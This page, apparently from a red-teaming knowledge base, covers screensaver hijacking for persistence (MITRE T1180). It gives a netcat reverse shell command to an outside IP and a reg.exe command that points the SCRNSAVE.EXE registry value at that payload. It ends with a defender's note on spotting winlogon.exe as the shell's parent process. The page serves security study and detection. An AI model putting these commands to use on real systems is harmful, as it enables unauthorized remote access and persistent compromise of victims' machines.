Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
DLL Proxying for Persistence
T1053: Schtask
T1035: Service Execution
T1015: Sticky Keys
T1136: Create Account
T1013: AddMonitor()
T1128: NetSh Helper DLL
T1084: Abusing Windows Managent Instrumentation
Windows Logon Helper
Hijacking Default File Extension
Persisting in svchost.exe with a Service DLL
Modifying .lnk Shortcuts
T1180: Screensaver Hijack
T1138: Application Shimming
T1197: BITS Jobs
T1122: COM Hijacking
T1198: SIP & Trust Provider Hijacking
T1209: Hijacking Time Providers
T1130: Installing Root Certificate
Powershell Profile Persistence
RID Hijacking
Word Library Add-Ins
Office Templates
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

T1180: Screensaver Hijack

Hijacking screensaver for persistence.

Execution

To achieve persistence, the attacker can modify SCRNSAVE.EXE value in the registry HKCU\Control Panel\Desktop\ and change its data to point to any malicious file.

In this test, I will use a netcat reverse shell as my malicious payload:

c:\shell.cmd@victim
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

Let's update the registry:

The same could be achieved using a native Windows binary reg.exe:

attacker@victim
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\shell.cmd

Observations

Note the process ancestry on the victim system - the reverse shell process traces back to winlogon.exe as the parent process, which is responsible for managing user logons/logoffs. This is highly suspect and should warrant a further investigation:

References

​

Previous
Modifying .lnk Shortcuts
Next
T1138: Application Shimming
Last updated 2 years ago
Contents
Execution
Observations
References